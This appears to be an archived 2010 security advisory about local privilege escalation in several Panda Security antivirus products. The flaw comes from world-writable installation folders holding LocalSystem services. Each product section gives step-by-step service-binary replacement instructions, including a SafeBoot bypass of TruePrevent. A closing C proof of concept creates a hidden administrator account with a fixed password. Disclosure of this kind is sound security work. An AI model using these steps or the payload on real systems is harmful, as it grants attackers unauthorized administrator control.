Panda Security Local Privilege Escalation

2010-01-12T00:00:00
ID SSV:18931
Type seebug
Reporter Root
Modified 2010-01-12T00:00:00

Description

No description provided by source.

                                        
                                            
                                                Description:
============

1. 32Bit Version of Panda Security for Desktops/File Servers
+-----------------------------------------------------------

During  installation  of  Panda Security for Desktops/File Servers the
permissions for installation folder

%ProgramFiles%\Panda Software\AVTC\

by  default  are  set  to Everyone:Full Control. Few services
(e.g. PAVSRV51.EXE) are started from this folder. Services are started
under LocalSystem  account.

The 32bit Version of Panda Security  for Desktops/File Servers
installs the TruePrevent package by default, which protects the files
in the installation directory from manipulation.

If the TruePrevent Service (Panda TPSrv) is not running the files are
completely unprotected.

A normal user is not able to stop the service, but normally he can boot
his workstation in SafeBoot mode, in which the TPSrv is not started and
all services files can be manipulated.

This can be exploited by:

    a. Boot the PC in SafeBoot mode, by pressing F8 during the boot
       process
    b. Rename  PAVSRV51.exe to PAVSRV51.old in Panda folder
    c. Copy any application to PAVSRV51.exe
    d. Reboot

Upon reboot trojaned application will be executed with LocalSystem
account.

Executable started as services:
+------------------------------
%ProgramFiles%\PANDA SOFTWARE\AVTC\PSKMsSvc.exe (Desktop only)
%ProgramFiles%\PANDA SOFTWARE\AVTC\PavSrv51.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PavFnSvr.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PSHost.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PsImSvc.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PsCtrlS.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\TPSrv.exe


2. 64Bit Version of Panda Security for Desktops/File Servers
+-----------------------------------------------------------

During  installation  of  Panda Security for Desktops/File Servers the
permissions for installation folder

%ProgramFiles%\Panda Software\AVTC\

by  default  are  set  to Everyone:Full Control. Few services
(e.g. PavSrvx86.EXE) are started from this folder. Services are started
under LocalSystem  account.

In the 64bit Version of Panda Security  for Desktops/File Servers is no
TruePrevent package available, which protects the files in the
installation directory from manipulation.

There is no protection of service files. It's possible for unprivileged
user to replace service executable with the file of his choice to get
full access with LocalSystem privileges.

This can be exploited by:

    a. Rename  PavSrvX86.exe to PavSrvX86.old in Panda folder
    b. Copy any application to PavSrvX86.exe
    c. Reboot

Upon reboot trojaned application will be executed with LocalSystem
account.

Executable started as services:
+------------------------------
C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PavSrvX86.exe
C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PsImSvc.exe
C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PskSvc.exe
C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PsCtrlS.exe


3. Panda Internet Security/Global Protection/Antivirus Pro 20XX
+-----------------------------------------------------------------------

During  installation  of the Panda Security 20XX Products the
permissions for installation folder

%ProgramFiles%\panda security\panda <product>\

by  default  are  set  to Everyone:Full Control. Few services
(e.g. PAVSRV51.EXE) are started from this folder. Services are started
under LocalSystem  account.

This products installs the TruePrevent package by default, which
protects the files in the installation directory from manipulation.

If the TruePrevent Service (Panda TPSrv) is not running the files are
completely unprotected.

A normal user is not able to stop the service, but normally he can boot
his workstation in SafeBoot mode, in which the TPSrv is not started and
all services files can be manipulated.

This can be exploited by:

    a. Boot the PC in SafeBoot mode, by pressing F8 during the boot
       process
    b. Rename  PAVSRV51.exe to PAVSRV51.old in Panda folder
    c. Copy any application to PAVSRV51.exe
    d. Reboot

Upon reboot trojaned application will be executed with LocalSystem
account.

Executable started as services:
+------------------------------
%ProgramFiles%\panda security\panda <product>\firewall\PSHOST.EXE
%ProgramFiles%\Panda Security\Panda <product>\PavFnSvr.exe
%ProgramFiles%\Panda Security\Panda <product>\PsImSvc.exe
%ProgramFiles%\Panda Security\Panda <product>\pavsrv51.exe
%ProgramFiles%\Panda Security\Panda <product>\PskSvc.exe
%ProgramFiles%\Panda Security\Panda <product>\PsCtrls.exe
%ProgramFiles%\Panda Security\Panda <product>\TPSrv.exe


4. Panda Antivirus for Netbooks
+------------------------------

During  installation  of the Panda Antivirus for Netbooks the
permissions for installation folder

%ProgramFiles%\panda security\Panda Antivirus for Netbooks\

by  default  are  set  to Everyone:Full Control. Few services
(e.g. PAVSRV51.EXE) are started from this folder. Services are started
under LocalSystem  account.

This product installs the TruePrevent package by default, which protects
the files in the installation directory from manipulation.

If the TruePrevent Service (Panda TPSrv) is not running the files are
completely unprotected.

A normal user is not able to stop the service, but normally he can boot
his workstation in SafeBoot mode, in which the TPSrv is not started and
all services files can be manipulated.

This can be exploited by:

    a. Boot the PC in SafeBoot mode, by pressing F8 during the boot
       process
    b. Rename  PAVSRV51.exe to PAVSRV51.old in Panda folder
    c. Copy any application to PAVSRV51.exe
    d. Reboot

Upon reboot trojaned application will be executed with LocalSystem
account.

This product was not patched like the other 2010 products, so the
the following vulnerability already exists:

http://www.securityfocus.com/bid/36897

TruePrevent bypass: It can be bypassed using "Open" dialog in
"Quarantine" -> Add file" functionality.

Executable started as services:
+------------------------------
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PavFnSvr.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PsImSvc.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\pavsrv51.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PskSvc.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PsCtrls.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\TPSrv.exe



Proof of Concept :
==================

#include <windows.h>
#include <stdio.h>

INT main( VOID )
{
CHAR szWinDir[ _MAX_PATH ];
CHAR szCmdLine[ _MAX_PATH ];

GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );

printf( "Creating user \"owner\" with password \"PandaOWner123\"...\n" );

wsprintf( szCmdLine, "%s\\system32\\net.exe user owner PandaOWner123
/add", szWinDir );

system( szCmdLine );

printf( "Adding user \"owner\" to the local Administrators group...\n" );

wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators
owner /add", szWinDir );

system( szCmdLine );

return 0;
}